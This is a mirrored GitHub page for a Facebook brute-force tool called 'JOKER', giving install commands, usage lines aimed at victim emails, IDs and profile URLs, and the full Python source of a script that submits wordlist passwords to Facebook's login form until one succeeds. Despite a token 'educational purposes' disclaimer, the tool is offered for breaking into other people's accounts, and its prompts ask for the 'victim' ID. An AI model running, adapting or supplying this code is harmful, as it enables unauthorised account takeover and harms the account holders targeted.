Giter Club home page Giter Club logo

joker-burtal-force's Introduction

Find Fikrado on :

Github Instagram Messenger Facebook

JOKER FACEBOOK BRUTAL FORCE ATTACK


Is facebook burtalforce attack tool you can use it in this OS and applications


1: KALI LINUX
2: ALL LINUX OS
3: TERMUX
4: ANY OS THAT PYTHON INSTALLED ON IT

HOW TO INSTALL JOKER BURTAL FORCE

apt update

apt install git -y

pkg install python python2 && pip2 install requests mechanize

git clone https://github.com/fikrado/JOKER-burtal-force

cd JOKER-burtal-force

python joker.py


HOW TO USE JOKER BRUTAL FORCE

      python joker.py -t [email protected] -w /usr/share/wordlists/rockyou.txt
   
      python joker.py -t 100001013078780 -w C:\\Users\\Me\\Desktop\\wordlist.txt
     
      python jokere.py -t [email protected] -w D:\\wordlist.txt -p 144.217.101.245:3129-
      
      python jokery.py -t [email protected] -s 1234567
     
      python joker.py -g https://www.facebook.com/Victim_Profile
     


VIDEO TUTORIAL HOW TO USE THE TOOL

IMAGE ALT TEXT HERE


screan shot

joker-burtal-force's People

Contributors

fikrado avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

joker-burtal-force's Issues

Committing fixes in the dark, seriously, who killed my power!?

fbbrute.py

#!usr/bin/python
#Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !
#This program is for educational purposes only.
#Don't attack people facebook accounts it's illegal ! 
#If you want to crack into someone's account, you must have the permission of the user. 
#InfosecHacker is not responsible.


import sys
import random
import mechanize
import cookielib

# Console colors
bg ='' # '\033[44m'  # gray
W = bg+'\033[0m'  # white (normal)
R = bg+'\033[31m'  # red
G = bg+'\033[32m'  # green
O = bg+'\033[33m'  # orange
B = bg+'\033[34m'  # blue
P = bg+'\033[35m'  # purple
C = bg+'\033[36m'  # cyan
GR = bg+'\033[37m'  # gray

GHT = G+'''
        +=========================================+
        |..........'''+O+'''Facebook Cracker v 2'''+G+'''...........|
        +-----------------------------------------+
        |'''+C+'''#Author: InfoSecHacker'''+G+'''                   |
        |'''+C+'''#Contact: www.twitter.com/abhishekmani002'''+G+'''|
        |'''+C+'''#Date: 23/10/2015'''+G+'''                        |
        |'''+C+'''#This tool is made for pentesting. '''+G+'''      |
        |'''+C+'''#Changing the Description of this tool'''+G+'''   |
        |'''+C+'''Won't made you the coder ^_^ !!!'''+G+'''         |
        |'''+C+'''#Respect Coderz ^_^           '''+G+'''           |
        |'''+C+'''#I take no responsibilities for the '''+G+'''     |
        |'''+C+''' use of this program !       '''+G+'''            |
        +=========================================+
        |..........'''+O+'''  MOD BY BANG DJON  '''+G+'''...........|
        +-----------------------------------------+
'''+W
print "Note: - This tool can crack facebook account even if you don't have the email of your victim"
print "# Hit CTRL+C to quit the program"
print "# Use www.graph.facebook.com for more infos about your victim ^_^"

try:
 DT=open('/storage/sdcard1/.fb.dat').readlines()
 email =ml=DT[0].replace('\n','')
 passwordlist =pw=DT[1].replace('\n','')
 q2=DT[2].replace('\n','')
except:
 email =ml=str(raw_input("# Masukkan ID korban\ncontoh: 100006541234567\nID = "))
 passwordlist =pw= str(raw_input("Masukkan file yg berisi password list\ncontoh:/sdcard/password.txt\nPASSWORD = "))
 q2=1 #raw_input('mulai password no brp om,,?? ')
 try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(q2))
 except:print ('tidak bisa menyimpan data, penyerangan akan selalu dimulai dari awal')

print O+'_____eemail_____='+ml+'\n'+'____password____='+pw+W

useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

login ='https://www.facebook.com/'
logs= 'https://www.facebook.com/login.php?login_attempt=1&lwv=110'
login1 ='https://web.facebook.com/'
logs1 = 'https://web.facebook.com/login.php?login_attempt=1&lwv=110'

no=1
panel=0
log=''
#'https://web.facebook.com/checkpoint/?next'
def attack(password):
  global panel,no,q2,log
  try:
    if no==int(q2):panel=1
    if panel ==1:
     sys.stdout.write("\r"+W+"[*]"+C+" mencoba password ke "+O+"%s %s.. " %(no,password)+W)
     sys.stdout.flush()
     br.addheaders = [('User-agent', random.choice(useragents))]
     site = br.open(login)
     br.select_form(nr=0)
         
     ##Facebook
     br.form['email'] =email
     br.form['pass'] = password
     br.submit()
     log = br.geturl()
     if log !=logs and log !=logs1:
      print log
      try:open('/sdcard1/password target.txt','w').write(str(password)+'\n'+str(log))
      except:pass
     if log == login or log == login1:
        print "\n\n\n [*] Password found .. !!"
        print "\n [*] Password : %s\n" % (password)
        sys.exit(1)
  except KeyboardInterrupt:
        print "\n[*] Exiting program .. "
        try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
        except:pass
        sys.exit(1)
  except:
        import traceback
        fe = traceback.format_exception
        sei = sys.exc_info
        print '\n'+str(sei()[1]) #(''.join(fe(*sei())))
        print (u'\nPlease contact me Bang-Djon')

        if log == login or log == login1:
         try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
         except:pass
        else:
         try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
         except:pass
         print "\n[*] exiting....... "
        sys.exit(1)

def search():
    global password,no
    for password in passwords:
        attack(password.replace("\n",""))
        no+=1



def check():

    global br
    global passwords
    global password,no
    try:
       br = mechanize.Browser()
       cj = cookielib.LWPCookieJar()
       br.set_handle_robots(False)
       br.set_handle_equiv(True)
       br.set_handle_referer(True)
       br.set_handle_redirect(True)
       br.set_cookiejar(cj)
       br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    except KeyboardInterrupt:
       print "\n[*] Exiting program ..\n"
       try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
       except:pass
       sys.exit(1)
    except:
       print "\n[*] Koneksi Habis .. "
       try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
       except:pass
       sys.exit(1)
    try:
       list = open(passwordlist, "r")
       passwords = list.readlines()
       k = 0
       while k < len(passwords):
          passwords[k] = passwords[k].strip()
          k += 1
    except IOError:
        print "\n [*] Error: check your password list path \n"
        sys.exit(1)
    except KeyboardInterrupt:
        print "\n [*] Exiting program ..\n"
        try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
        except:pass
        sys.exit(1)
    except:
        print "\n[*] Koneksi Habis .. "
        try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
        except:pass
        sys.exit(1)
    try:
        print GHT
        print W+" [*]"+C+" Account to crack :"+O+" %s" % (email)+W
        print W+" [*]"+C+" Loaded :" , O+str(len(passwords)),C+ "passwords"+W
        print W+" [*]"+C+" Cracking, please wait ..."+W
    except KeyboardInterrupt:
        print "\n [*] Exiting program ..\n"
        try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
        except:pass
        sys.exit(1)
    except:
        print "\n[*] Koneksi Habis .. "
        try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
        except:pass
        sys.exit(1)
    try:
        search()
        attack(password)
    except KeyboardInterrupt:
        print "\n [*] Exiting program ..\n"
        try:open('/storage/sdcard1/.fb.dat','w').write(ml+'\n'+pw+'\n'+str(no))
        except:pass
        sys.exit(1)

if __name__ == '__main__':
    check()

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.